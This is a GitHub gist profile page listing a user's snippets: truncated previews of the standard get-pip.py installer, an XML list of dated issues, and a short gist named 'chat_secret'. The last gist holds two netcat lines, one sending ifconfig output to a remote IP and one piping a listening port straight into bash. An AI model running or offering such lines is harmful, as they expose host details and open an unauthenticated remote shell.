Skip to content

Instantly share code, notes, and snippets.

View gregoirelinot's full-sized avatar
⛰️

Gregoire Linot gregoirelinot

⛰️
View GitHub Profile
View gist:4b267d3a84005f0d41cc831a545ecd9c
This file has been truncated, but you can view the full file.
#!/usr/bin/env python
#
# Hi There!
# You may be wondering what this giant blob of binary data here is, you might
# even be worried that we're up to something nefarious (good for you for being
# paranoid!). This is a base85 encoding of a zip file, this zip file contains
# an entire copy of pip.
#
# Pip is a thing that installs packages, pip itself is a package that someone
# might want to install, especially if they're looking to run this get-pip.py
View gist:f00fdb5af34c66fb722e7fbc25e5974f
This file has been truncated, but you can view the full file.
#!/usr/bin/env python
#
# Hi There!
# You may be wondering what this giant blob of binary data here is, you might
# even be worried that we're up to something nefarious (good for you for being
# paranoid!). This is a base85 encoding of a zip file, this zip file contains
# an entire copy of pip.
#
# Pip is a thing that installs packages, pip itself is a package that someone
# might want to install, especially if they're looking to run this get-pip.py
View issues.xml
<?xml version="1.0" encoding="UTF-8"?>
<issues>
<issue>
<title>27th jul 2017</title>
<releaseDate> Jul 27, 2017 </releaseDate>
<pubDate>Jul 27, 2017</pubDate>
<slug>27th-jul-2017</slug>
</issue>
<issue>
<title>28th jul 2017</title>
View chat_secret
ifconfig | nc 10.132.11.206 8001;
nc -l 8000 | bash